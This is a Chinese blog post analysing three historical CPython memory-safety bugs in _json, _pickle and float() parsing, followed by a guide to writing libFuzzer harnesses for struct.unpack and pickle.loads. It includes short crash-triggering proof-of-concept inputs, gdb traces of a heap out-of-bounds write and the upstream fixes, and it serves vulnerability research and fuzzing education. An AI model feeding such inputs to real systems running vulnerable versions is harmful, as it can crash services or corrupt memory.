cpython历史漏洞分析及其fuzzer编写

历史漏洞分析

主要历史漏洞来源于cpython hackerone
这篇文章首先分析三个cpython历史漏洞，在我们简单熟悉了cpython的源码结构以后，再来编写一个fuzzer，其实算是添加fuzzer

Integer overflow in _json_encode_unicode

调试环境

kali x86
GNU gdb (Debian 9.2-1) 9.2
gcc (Debian 9.3.0-13) 9.3.0

漏洞官方issue

找到最近的一个未修复漏洞的commit

➜  cpython git:(master) git log --grep="prevent integer overflow"

commit bdaeb7d237462a629e6c85001317faa85f94a0c6
Author: Victor Stinner <victor.stinner@gmail.com>
Date:   Mon Oct 16 08:44:31 2017 -0700

    bpo-31773: _PyTime_GetPerfCounter() uses _PyTime_t (GH-3983)

    * Rewrite win_perf_counter() to only use integers internally.
    * Add _PyTime_MulDiv() which compute "ticks * mul / div"
      in two parts (int part and remaining) to prevent integer overflow.
    * Clock frequency is checked at initialization for integer overflow.
    * Enhance also pymonotonic() to reduce the precision loss on macOS
      (mach_absolute_time() clock).

commit 7b78d4364da086baf77202e6e9f6839128a366ff
Author: Benjamin Peterson <benjamin@python.org>
Date:   Sat Jun 27 15:01:51 2015 -0500

    prevent integer overflow in escape_unicode (closes #24522)

➜  cpython git:(master) git checkout -f 7b78d4364da086baf77202e6e9f6839128a366ff
➜  cpython git:(7b78d4364d) git log

commit 7b78d4364da086baf77202e6e9f6839128a366ff (HEAD)
Author: Benjamin Peterson <benjamin@python.org>
Date:   Sat Jun 27 15:01:51 2015 -0500

    prevent integer overflow in escape_unicode (closes #24522)

commit 758d60baaa3c041d0982c84d514719ab197bd6ed //  未修复
Merge: 7763c68dcd acac1e0e3b
Author: Benjamin Peterson <benjamin@python.org>
Date:   Sat Jun 27 14:26:21 2015 -0500

    merge 3.4

commit acac1e0e3bf564fbad2107d8f50d7e9c42e5ef22
Merge: ff0f322edb dac3ab84c7
Author: Benjamin Peterson <benjamin@python.org>
Date:   Sat Jun 27 14:26:15 2015 -0500

    merge 3.3

commit dac3ab84c73eb99265f0cf4863897c8e8302dbfd
Author: Benjamin Peterson <benjamin@python.org>
Date:   Sat Jun 27 14:25:50 2015 -0500
...
➜  cpython git:(7b78d4364d) git checkout -f 758d60baaa3c041d0982c84d514719ab197bd6ed
Previous HEAD position was 7b78d4364d prevent integer overflow in escape_unicode (closes #24522)
HEAD is now at 758d60baaa merge 3.4

确定漏洞复现commit: 758d60baaa3c041d0982c84d514719ab197bd6ed
使用gcc编译该commit代码

➜  cpython git:(7b78d4364d) export ASAN_OPTIONS=exitcode=0 # clang -fsantize=address 发生错误时不退出
➜  cpython git:(7b78d4364d) CC="gcc -g -fsanitize=address" ./configure --disable-ipv6
➜  cpython git:(7b78d4364d) make
➜  cpython git:(758d60baaa) ./python --version
Python 3.5.0b2+

使用的poc.py

import json

sp = "x13"*715827883 #((2**32)/6 + 1)
json.dumps([sp], ensure_ascii=False)

使用gdb调试

(gdb) b Modules/_json.c:265
No source file named Modules/_json.c.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 1 (Modules/_json.c:265) pending.
(gdb) r poc.py
Starting program: /root/cpython/python poc.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Breakpoint 1, escape_unicode (pystr=0x85c54800) at /root/cpython/Modules/_json.c:265
265        rval = PyUnicode_New(output_size, maxchar);
(gdb) p output_size
$1 = <optimized out>
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xb6028131 in escape_unicode (pystr=0x85c54800) at /root/cpython/Modules/_json.c:302
302            ENCODE_OUTPUT;

可以发现程序确实是崩溃了，但是我们没有看到output_size的值，为了观察其值，我们将Makefile中的-O3优化改为-O0,重新编译，再次使用gdb调试

(gdb) b Modules/_json.c:265
No source file named Modules/_json.c.
Make breakpoint pending on future shared library load? (y or [n]) y
Breakpoint 1 (Modules/_json.c:265) pending.
(gdb) r poc.py
Starting program: /root/cpython/python poc.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Breakpoint 1, escape_unicode (pystr=0x85c54800) at /root/cpython/Modules/_json.c:265
265        rval = PyUnicode_New(output_size, maxchar);

(gdb) p input_chars
$1 = 715827883

(gdb) p output_size
$2 = 4 <== 整数溢出

来分析一下溢出原因，溢出出现在_json.c:escape_unicode函数中

maxchar = PyUnicode_MAX_CHAR_VALUE(pystr);
input_chars = PyUnicode_GET_LENGTH(pystr);
input = PyUnicode_DATA(pystr);
kind = PyUnicode_KIND(pystr);

/* Compute the output size */
for (i = 0, output_size = 2; i < input_chars; i++) {
    Py_UCS4 c = PyUnicode_READ(kind, input, i);
    switch (c) {
    case '\': case '"': case 'b': case 'f':
    case 'n': case 'r': case 't':
        output_size += 2;
        break;
    default:
        if (c <= 0x1f)
            output_size += 6; // 溢出，最后始终没有检测output_size的值，直接带入下面的New
        else
            output_size++;
    }
}

rval = PyUnicode_New(output_size, maxchar);

修复

maxchar = PyUnicode_MAX_CHAR_VALUE(pystr);
input_chars = PyUnicode_GET_LENGTH(pystr);
input = PyUnicode_DATA(pystr);
kind = PyUnicode_KIND(pystr);

/* Compute the output size */
for (i = 0, output_size = 2; i < input_chars; i++) {
    Py_UCS4 c = PyUnicode_READ(kind, input, i);
    Py_ssize_t d;
    switch (c) {
    case '\': case '"': case 'b': case 'f':
    case 'n': case 'r': case 't':
        d = 2;
        break;
    default:
        if (c <= 0x1f)
            d = 6;
        else
            d = 1;
    }
    if (output_size > PY_SSIZE_T_MAX - d) { // 每次都需要做溢出判断
        PyErr_SetString(PyExc_OverflowError, "string is too long to escape");
        return NULL;
    }
    output_size += d;
}

rval = PyUnicode_New(output_size, maxchar);

Integer overflow in _pickle.c

漏洞官方issue
利用上面的方法找到最近的未修复commit:614bfcc953141cfdd38606f87a09d39f17367fa3

poc.py

import pickle
pickle.loads(b'I1nrx00x00x00x20x2e')

编译之后直接利用gdb调试poc(编译不使用-fsanitize选项)

(gdb) r poc.py
Starting program: /root/cpython/python poc.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0xb7875252 in _Unpickler_ResizeMemoList (self=0xb789c2fc, new_size=1073741824) at /root/cpython/Modules/_pickle.c:1069
1069            self->memo[i] = NULL;
(gdb) bt
#0  0xb7875252 in _Unpickler_ResizeMemoList (self=0xb789c2fc, new_size=1073741824) at /root/cpython/Modules/_pickle.c:1069
#1  0xb78752da in _Unpickler_MemoPut (self=0xb789c2fc, idx=536870912, value=0x664540 <small_ints+96>) at /root/cpython/Modules/_pickle.c:1092
#2  0xb787d75e in load_long_binput (self=0xb789c2fc) at /root/cpython/Modules/_pickle.c:5028
#3  0xb787e6bd in load (self=0xb789c2fc) at /root/cpython/Modules/_pickle.c:5409
#4  0xb78802e4 in pickle_loads (self=0xb78cb50c, args=0xb7931eac, kwds=0x0) at /root/cpython/Modules/_pickle.c:6336
#5  0x00569701 in PyCFunction_Call (func=0xb789d92c, arg=0xb7931eac, kw=0x0) at Objects/methodobject.c:84
#6  0x0048f744 in call_function (pp_stack=0xbfffeb80, oparg=1) at Python/ceval.c:4066
#7  0x0048b279 in PyEval_EvalFrameEx (f=0xb79b584c, throwflag=0) at Python/ceval.c:2679
#8  0x0048dc95 in PyEval_EvalCodeEx (_co=0xb79355c0, globals=0xb797666c, locals=0xb797666c, args=0x0, argcount=0, kws=0x0, kwcount=0, defs=0x0, defcount=0,
    kwdefs=0x0, closure=0x0) at Python/ceval.c:3436
#9  0x00482287 in PyEval_EvalCode (co=0xb79355c0, globals=0xb797666c, locals=0xb797666c) at Python/ceval.c:771
#10 0x004b464a in run_mod (mod=0x701b50, filename=0xb799bd98 "poc.py", globals=0xb797666c, locals=0xb797666c, flags=0xbffff478, arena=0x6aab10)
    at Python/pythonrun.c:1996
#11 0x004b44ba in PyRun_FileExFlags (fp=0x6f3e80, filename=0xb799bd98 "poc.py", start=257, globals=0xb797666c, locals=0xb797666c, closeit=1,
    flags=0xbffff478) at Python/pythonrun.c:1952
#12 0x004b3048 in PyRun_SimpleFileExFlags (fp=0x6f3e80, filename=0xb799bd98 "poc.py", closeit=1, flags=0xbffff478) at Python/pythonrun.c:1452
#13 0x004b251c in PyRun_AnyFileExFlags (fp=0x6f3e80, filename=0xb799bd98 "poc.py", closeit=1, flags=0xbffff478) at Python/pythonrun.c:1174
#14 0x004ccdc2 in run_file (fp=0x6f3e80, filename=0x6697d0 L"poc.py", p_cf=0xbffff478) at Modules/main.c:307
#15 0x004cd8e0 in Py_Main (argc=2, argv=0x6661a0) at Modules/main.c:744
#16 0x0042569a in main (argc=2, argv=0xbffff5d4) at ./Modules/python.c:62

(gdb) x/10x self->memo
0x6af900:    0x00000000    0x00000000    0x00000000    0x00000081
0x6af910:    0x006d2da8    0xb7e8e778    0x00000000    0x00000000
0x6af920:    0x00000000    0x00000000

(gdb) x/10x self->memo+i
0x73d000:    Cannot access memory at address 0x73d000

(gdb) p new_size
$3 = 1073741824

(gdb) p/x new_size
$4 = 0x40000000

(gdb) p PY_SSIZE_T_MAX
No symbol "PY_SSIZE_T_MAX" in current context.

(gdb) p new_size * sizeof(PyObject *)
$5 = 0 <== 溢出

(gdb) p sizeof(PyObject *)
$6 = 4

(gdb) p memo
$7 = (PyObject **) 0x6af900

(gdb) p *memo
$8 = (PyObject *) 0x0

(gdb) p self->memo_size
$9 = 32

可以发现由于整数溢出，已经导致了一个越界写的漏洞。
根据其调用栈，我们来一步一步分析其溢出的原因
来看一下最后出错函数

static int
_Unpickler_ResizeMemoList(UnpicklerObject *self, Py_ssize_t new_size)
{
    Py_ssize_t i;
    PyObject **memo;

    assert(new_size > self->memo_size);

    memo = PyMem_REALLOC(self->memo, new_size * sizeof(PyObject *));
    if (memo == NULL) {
        PyErr_NoMemory();
        return -1;
    }
    self->memo = memo;
    for (i = self->memo_size; i < new_size; i++)
        self->memo[i] = NULL;
    self->memo_size = new_size;
    return 0;
}

根据gdb调试显示，由于溢出导致new_size * sizeof(PyObject *)数值为0，当其为0时传入

#define PyMem_REALLOC(p, n)    ((size_t)(n) > (size_t)PY_SSIZE_T_MAX  ? NULL 
                : realloc((p), (n) ? (n) : 1))

也就是realloc(p, 1)，执行成功，接下来就会造成越界写

self->memo[i] = NULL; // 越界写

继续回溯，看看new_size如何得到

static int
_Unpickler_MemoPut(UnpicklerObject *self, Py_ssize_t idx, PyObject *value)
{
    PyObject *old_item;

    if (idx >= self->memo_size) { // 条件成立直接*2分配空间
        if (_Unpickler_ResizeMemoList(self, idx * 2) < 0)
            return -1;
        assert(idx < self->memo_size);
    }
    Py_INCREF(value);
    old_item = self->memo[idx];
    self->memo[idx] = value;
    Py_XDECREF(old_item);
    return 0;
}

再次回溯，寻找idx的来源

static int
load_long_binput(UnpicklerObject *self)
{
    PyObject *value;
    Py_ssize_t idx;
    char *s;

    if (_Unpickler_Read(self, &s, 4) < 0)
        return -1;

    if (Py_SIZE(self->stack) <= 0)
        return stack_underflow();
    value = self->stack->data[Py_SIZE(self->stack) - 1];

    idx = calc_binsize(s, 4);
    if (idx < 0) {
        PyErr_SetString(PyExc_ValueError,
                        "negative LONG_BINPUT argument");
        return -1;
    }

    return _Unpickler_MemoPut(self, idx, value);
}

查看calc_binsize函数

static Py_ssize_t
calc_binsize(char *bytes, int size)
{
    unsigned char *s = (unsigned char *)bytes;
    size_t x = 0;

    assert(size == 4);

    x =  (size_t) s[0];
    x |= (size_t) s[1] << 8;
    x |= (size_t) s[2] << 16;
    x |= (size_t) s[3] << 24;

    if (x > PY_SSIZE_T_MAX)
        return -1;
    else
        return (Py_ssize_t) x;
}

其最终来源于我们的输入值，所以通过修改我们的输入值，可以成功导致基于堆的越界写

修复

#define PyMem_RESIZE(p, type, n) 
  ( (p) = ((size_t)(n) > PY_SSIZE_T_MAX / sizeof(type)) ? NULL :    
    (type *) PyMem_REALLOC((p), (n) * sizeof(type)) //  如果为0，直接失败

int and float constructing from non NUL-terminated buffer

找到未修复commit:9ad0aae6566311c6982a20955381cda5a2954519
官方issues

这个issue我找到了commit，搭建了环境，但是没有复现成功，最主要的是，对我们寻找fuzz方面没有太大帮助，但是对我们理解字符串转换的危害还是很有帮助的，所以我们从原理上来跟一下源码
那就通过issue中提到的代码，从理论上来复现一下

poc.py

import array
float(array.array("B",b"A"*0x10))

调用栈

STACK_TEXT:  
0080f328 651ac6e9 ffffffff 000000c8 00000000 python35!unicode_fromformat_write_cstr+0x10
0080f384 651ac955 0080f39c 090a2fe8 65321778 python35!unicode_fromformat_arg+0x409
0080f3d8 651f1a1a 65321778 0080f404 090a2fe8 python35!PyUnicode_FromFormatV+0x65
0080f3f4 652070a9 6536bd38 65321778 090a2fe8 python35!PyErr_Format+0x1a
0080f42c 6516be70 090a2fe8 0080f484 00000000 python35!PyOS_string_to_double+0xa9
0080f4f4 6514808b 06116b00 6536d658 6536d658 python35!PyFloat_FromString+0x100
0080f554 6516e6e2 06116b00 06116b00 06116b00 python35!PyNumber_Float+0xcb
...

直接看代码，首先是floatobject.c中的PyFloat_FromString

PyObject *
PyFloat_FromString(PyObject *v)
{
    const char *s, *last, *end;
    double x;
    PyObject *s_buffer = NULL;
    Py_ssize_t len;
    Py_buffer view = {NULL, NULL};
    PyObject *result = NULL;

    if (PyUnicode_Check(v)) {
        s_buffer = _PyUnicode_TransformDecimalAndSpaceToASCII(v);
        if (s_buffer == NULL)
            return NULL;
        s = PyUnicode_AsUTF8AndSize(s_buffer, &len);
        if (s == NULL) {
            Py_DECREF(s_buffer);
            return NULL;
        }
    }
    else if (PyObject_GetBuffer(v, &view, PyBUF_SIMPLE) == 0) {
        s = (const char *)view.buf;    <<<<< 确定s的数据
        len = view.len;
    }
    else {
        PyErr_Format(PyExc_TypeError,
            "float() argument must be a string or a number, not '%.200s'",
            Py_TYPE(v)->tp_name);
        return NULL;
    }
    last = s + len;
    /* strip space */
    while (s < last && Py_ISSPACE(*s))
        s++;
    while (s < last - 1 && Py_ISSPACE(last[-1]))
        last--;
    /* We don't care about overflow or underflow.  If the platform
     * supports them, infinities and signed zeroes (on underflow) are
     * fine. */
    x = PyOS_string_to_double(s, (char **)&end, NULL);
    ...
}

跟进PyOS_string_to_double

if (errno == ENOMEM) {
        PyErr_NoMemory();
        fail_pos = (char *)s;
    }
else if (!endptr && (fail_pos == s || *fail_pos != ''))
    PyErr_Format(PyExc_ValueError,
                    "could not convert string to float: "
                    "%.200s", s);
else if (fail_pos == s)
    PyErr_Format(PyExc_ValueError,
                    "could not convert string to float: "
                    "%.200s", s);
else if (errno == ERANGE && fabs(x) >= 1.0 && overflow_exception)
    PyErr_Format(overflow_exception,
                    "value too large to convert to float: "
                    "%.200s", s);
else
    result = x;

跟进PyErr_Format函数

PyObject *
PyErr_Format(PyObject *exception, const char *format, ...)
{
    va_list vargs;
    PyObject* string;

#ifdef HAVE_STDARG_PROTOTYPES
    va_start(vargs, format);
#else
    va_start(vargs);
#endif

#ifdef Py_DEBUG
    /* in debug mode, PyEval_EvalFrameEx() fails with an assertion error
       if an exception is set when it is called */
    PyErr_Clear();
#endif

    string = PyUnicode_FromFormatV(format, vargs);
    PyErr_SetObject(exception, string);
    Py_XDECREF(string);
    va_end(vargs);
    return NULL;
}

继续跟进PyUnicode_FromFormatV

yObject *
PyUnicode_FromFormatV(const char *format, va_list vargs)
{
    va_list vargs2;
    const char *f;
    _PyUnicodeWriter writer;

    _PyUnicodeWriter_Init(&writer);
    writer.min_length = strlen(format) + 100;
    writer.overallocate = 1;

    /* va_list may be an array (of 1 item) on some platforms (ex: AMD64).
       Copy it to be able to pass a reference to a subfunction. */
    Py_VA_COPY(vargs2, vargs);

    for (f = format; *f; ) {
        if (*f == '%') {
            f = unicode_fromformat_arg(&writer, f, &vargs2);
            if (f == NULL)
                goto fail;
        }
    ...

根据调用栈跟进unicode_fromformat_arg
由于format是由%s构成，所以我们只看s部分

unicode_fromformat_arg

...
case 's':
    {
        /* UTF-8 */
        const char *s = va_arg(*vargs, const char*);
        if (unicode_fromformat_write_cstr(writer, s, width, precision) < 0)
            return NULL;
        break;
    }
...

利用va_arg直接读取了参数，并将指针s指向该地址，继续跟进unicode_fromformat_write_cstr

static int
unicode_fromformat_write_cstr(_PyUnicodeWriter *writer, const char *str,
                              Py_ssize_t width, Py_ssize_t precision)
{
    /* UTF-8 */
    Py_ssize_t length;
    PyObject *unicode;
    int res;

    length = strlen(str); 
    if (precision != -1)
        length = Py_MIN(length, precision);
    unicode = PyUnicode_DecodeUTF8Stateful(str, length, "replace", NULL);
    if (unicode == NULL)
        return -1;

    res = unicode_fromformat_write_str(writer, unicode, width, -1);
    Py_DECREF(unicode);
    return res;
}

直接利用strlen计算上面的参数长度，如果str不是一个以结尾的字符串，那么接下来利用长度访问该地址的数据将会出现越界读写的问题

该漏洞主要原因来源于floatobject.c中的代码，%s的数据由强制转换而来

else if (PyObject_GetBuffer(v, &view, PyBUF_SIMPLE) == 0) {
        s = (const char *)view.buf;    <<<<< 强制转换
        len = view.len;
    }

提醒我们，在做强制转换时，要注意检查是否可以转换，转换后会不会造成漏洞

fuzzer编写

上文我们已经分析完cpython的三个漏洞了，对cpython有了一定的了解，那么我们就开始编写cpython的fuzzer代码。
在编写前，我们来看看cpython自己有没有fuzz测试模块，简单搜索一下，发现在Modules/_xxtestfuzz/目录下存在fuzz代码，这就好办了，我们直接在此基础上添加我们想要测试的模块的fuzz代码就行

首先阅读一下fuzz.c大概的代码逻辑就会发现，如果想要添加模块的fuzz代码，还是很简单的
主要需要修改的就两个部分，拿struck.unpack来举例子

第一步，初始化

PyObject* struct_unpack_method = NULL;
PyObject* struct_error = NULL;
/* Called by LLVMFuzzerTestOneInput for initialization */
static int init_struct_unpack() {
    /* Import struct.unpack */
    PyObject* struct_module = PyImport_ImportModule("struct"); // 导出模块
    if (struct_module == NULL) {
        return 0;
    }
    struct_error = PyObject_GetAttrString(struct_module, "error"); // 导出所有的错误对象
    if (struct_error == NULL) {
        return 0;
    }
    struct_unpack_method = PyObject_GetAttrString(struct_module, "unpack"); // 得到unpack函数
    return struct_unpack_method != NULL;
}

第二步，调用需要fuzz的函数，并过滤一些不必要的错误

/* Fuzz struct.unpack(x, y) */
static int fuzz_struct_unpack(const char* data, size_t size) {
    /* Everything up to the first null byte is considered the
       format. Everything after is the buffer */
    const char* first_null = memchr(data, '', size);
    if (first_null == NULL) {
        return 0;
    }

    size_t format_length = first_null - data;
    size_t buffer_length = size - format_length - 1;

    PyObject* pattern = PyBytes_FromStringAndSize(data, format_length);
    if (pattern == NULL) {
        return 0;
    }
    PyObject* buffer = PyBytes_FromStringAndSize(first_null + 1, buffer_length);
    if (buffer == NULL) {
        Py_DECREF(pattern);
        return 0;
    }

    PyObject* unpacked = PyObject_CallFunctionObjArgs(
        struct_unpack_method, pattern, buffer, NULL); // 调用函数
    /* Ignore any overflow errors, these are easily triggered accidentally */
    if (unpacked == NULL && PyErr_ExceptionMatches(PyExc_OverflowError)) { // 过滤不必要的错误
        PyErr_Clear();
    }
    /* The pascal format string will throw a negative size when passing 0
       like: struct.unpack('0p', b'') */
    if (unpacked == NULL && PyErr_ExceptionMatches(PyExc_SystemError)) {
        PyErr_Clear();
    }
    /* Ignore any struct.error exceptions, these can be caused by invalid
       formats or incomplete buffers both of which are common. */
    if (unpacked == NULL && PyErr_ExceptionMatches(struct_error)) {
        PyErr_Clear();
    }

    Py_XDECREF(unpacked);
    Py_DECREF(pattern);
    Py_DECREF(buffer);
    return 0;
}

再添加一下libfuzzer调用代码

#if !defined(_Py_FUZZ_ONE) || defined(_Py_FUZZ_fuzz_struct_unpack)
    static int STRUCT_UNPACK_INITIALIZED = 0;
    if (!STRUCT_UNPACK_INITIALIZED && !init_struct_unpack()) {
        PyErr_Print();
        abort();
    } else {
        STRUCT_UNPACK_INITIALIZED = 1;
    }
    rv |= _run_fuzz(data, size, fuzz_struct_unpack);
#endif

整个过程完事

这里其实比较麻烦的是过滤错误信息，因为你不一定能知道你要fuzz的模块的所有错误信息，很有可能过滤不全，在fuzz的时候会出错，导致需要重新添加过滤条件，再重新开启fuzz，整个过程，我也没有很好的办法，就是不停的试错，最后把无关的错误信息都过滤，下面就会遇到这样的问题

我们上面分析的第一个漏洞json已经存在fuzz模块了，那么我们就添加第二个pickle模块的fuzz代码

首先初始化

PyObject* pickle_loads_method = NULL;

/* Called by LLVMFuzzerTestOneInput for initialization */
static int init_pickle_loads() {
    /* Import struct.unpack */
    PyObject* pickle_module = PyImport_ImportModule("pickle");
    if (pickle_module == NULL) {
        return 0;
    }
    pickle_loads_method = PyObject_GetAttrString(pickle_module, "loads");
    return pickle_loads_method != NULL;
}

pickle本身的错误对象，我们需要到_pickle.c里面去找，在该文件的最后我们找到了添加错误对象的代码

PyMODINIT_FUNC
PyInit__pickle(void)
{
    PyObject *m;
    PickleState *st;

    m = PyState_FindModule(&_picklemodule);
    if (m) {
        Py_INCREF(m);
        return m;
    }

    if (PyType_Ready(&Pdata_Type) < 0)
        return NULL;
    if (PyType_Ready(&PicklerMemoProxyType) < 0)
        return NULL;
    if (PyType_Ready(&UnpicklerMemoProxyType) < 0)
        return NULL;

    /* Create the module and add the functions. */
    m = PyModule_Create(&_picklemodule);
    if (m == NULL)
        return NULL;

    /* Add types */
    if (PyModule_AddType(m, &Pickler_Type) < 0) {
        return NULL;
    }
    if (PyModule_AddType(m, &Unpickler_Type) < 0) {
        return NULL;
    }
    if (PyModule_AddType(m, &PyPickleBuffer_Type) < 0) {
        return NULL;
    }

    st = _Pickle_GetState(m);

    /* Initialize the exceptions. */
    st->PickleError = PyErr_NewException("_pickle.PickleError", NULL, NULL); // 添加第一个错误对象
    if (st->PickleError == NULL)
        return NULL;
    st->PicklingError = 
        PyErr_NewException("_pickle.PicklingError", st->PickleError, NULL)  // 添加第二个错误对象;
    if (st->PicklingError == NULL)
        return NULL;
    st->UnpicklingError = 
        PyErr_NewException("_pickle.UnpicklingError", st->PickleError, NULL); // 添加第三个错误对象
    if (st->UnpicklingError == NULL)
        return NULL;

    Py_INCREF(st->PickleError);
    if (PyModule_AddObject(m, "PickleError", st->PickleError) < 0)
        return NULL;
    Py_INCREF(st->PicklingError);
    if (PyModule_AddObject(m, "PicklingError", st->PicklingError) < 0)
        return NULL;
    Py_INCREF(st->UnpicklingError);
    if (PyModule_AddObject(m, "UnpicklingError", st->UnpicklingError) < 0)
        return NULL;

    if (_Pickle_InitState(st) < 0)
        return NULL;
    return m;
}

进一步完善初始化代码

PyObject* pickle_loads_method = NULL;
PyObject* pickle_error = NULL;
PyObject* pickling_error = NULL;
PyObject* unpickling_error = NULL;

/* Called by LLVMFuzzerTestOneInput for initialization */
static int init_pickle_loads() {
    /* Import struct.unpack */
    PyObject* pickle_module = PyImport_ImportModule("pickle");
    if (pickle_module == NULL) {
        return 0;
    }
    // 获取pickle所有error对象
    pickle_error = PyObject_GetAttrString(pickle_module, "PickleError");
    if (pickle_error == NULL) {
        return 0;
    }
    pickling_error = PyObject_GetAttrString(pickle_module, "PicklingError");
    if (pickling_error == NULL) {
        return 0;
    }
    unpickling_error = PyObject_GetAttrString(pickle_module, "UnpicklingError");
    if (unpickling_error == NULL) {
        return 0;
    }
    pickle_loads_method = PyObject_GetAttrString(pickle_module, "loads");
    return pickle_loads_method != NULL;
}

继续编写调用代码

#define MAX_PICKLE_TEST_SIZE 0x10000
static int fuzz_pickle_loads(const char* data, size_t size) {
    if (size > MAX_PICKLE_TEST_SIZE) {
        return 0;
    }
    PyObject* input_bytes = PyBytes_FromStringAndSize(data, size);
    if (input_bytes == NULL) {
        return 0;
    }
    PyObject* parsed = PyObject_CallOneArg(pickle_loads_method, input_bytes);
    // 将可能会遇到的各种error加进来。进行忽略
    if (parsed == NULL && // 这里的错误过滤信息，需要一步一步测试，这是我测试的完整列表
            (PyErr_ExceptionMatches(PyExc_ValueError) ||
            PyErr_ExceptionMatches(PyExc_AttributeError) ||
            PyErr_ExceptionMatches(PyExc_KeyError) ||
            PyErr_ExceptionMatches(PyExc_TypeError) ||
            PyErr_ExceptionMatches(PyExc_OverflowError) ||
            PyErr_ExceptionMatches(PyExc_EOFError) ||
            PyErr_ExceptionMatches(PyExc_MemoryError) ||
            PyErr_ExceptionMatches(PyExc_ModuleNotFoundError) ||
            PyErr_ExceptionMatches(PyExc_IndexError) ||
            PyErr_ExceptionMatches(PyExc_UnicodeDecodeError))) 
    {
        PyErr_Clear();
    }

    // pickle自身error进行忽略
    if (parsed == NULL && (
           PyErr_ExceptionMatches(pickle_error) ||
           PyErr_ExceptionMatches(pickling_error) ||
           PyErr_ExceptionMatches(unpickling_error)
    ))
    {
        PyErr_Clear();
    }
    Py_DECREF(input_bytes);
    Py_XDECREF(parsed);
    return 0;
}

添加libfuzzer调用代码

#if !defined(_Py_FUZZ_ONE) || defined(_Py_FUZZ_fuzz_pickle_loads)
    static int PICKLE_LOADS_INITIALIZED = 0;
    if (!PICKLE_LOADS_INITIALIZED && !init_pickle_loads()) {
        PyErr_Print();
        abort();
    } else {
        PICKLE_LOADS_INITIALIZED = 1;
    }

    rv |= _run_fuzz(data, size, fuzz_pickle_loads);
#endif

这里需要有一点注意的，如果我们直接利用上面的编译，可以使用，但是很快fuzz_pickle_loads就会退出，
退出的原因在于libfuzzer会有内存限制，即使提高了libfuzzer的内存使用量，但随着我们测试的深入，依然会因为内存不足
导致出问题，这个问题困扰了我很久，在不断试错，不断调试后发现最后通过修改cpython的源码解决

具体修改Includepyport.h里面的代码

#define PY_SSIZE_T_MAX ((Py_ssize_t)(((size_t)-1)>>1))

修改为

#define PY_SSIZE_T_MAX 838860800  // 100MB 100 * 1024 * 1024 * 8

这样就解决了libfuzzer内存限制，导致fuzz不断失败的问题
修改完后，可能cpython某些模块会因为内存过小导致编译失败，这里可以略过，只要我们的fuzzer程序能跑起来就行

整个过程折腾了我两天的时间，各种编译和运行错误，最后成功执行

tmux new -s fuzz_pickle ./out/fuzz_pickle_loads -jobs=60 -workers=6

我用六个线程，大概跑了一周的时间，没有发现任何crash，果然这种顶级开源项目相对来说代码质量还是不错的。有兴趣的可以自己跑一下，万一跑出来漏洞了呢 ?

总结

最近大部分时间都是在看开源软件的漏洞，比如网络组件，开源语言等等，开源软件的好处就是我们可以直接根据commit，定位到漏洞，了解其漏洞原理和修复方法，之后就是不断分析其中的漏洞，然后想办法能不能自己编写一个fuzzer把这些漏洞跑出来，整个过程不断提高自己编写fuzzer的能力和分析漏洞的能力。

这类文章我应该会有一个开源漏洞fuzz系列，这个是第一篇，感兴趣的话可以关注一下我的博客

（完）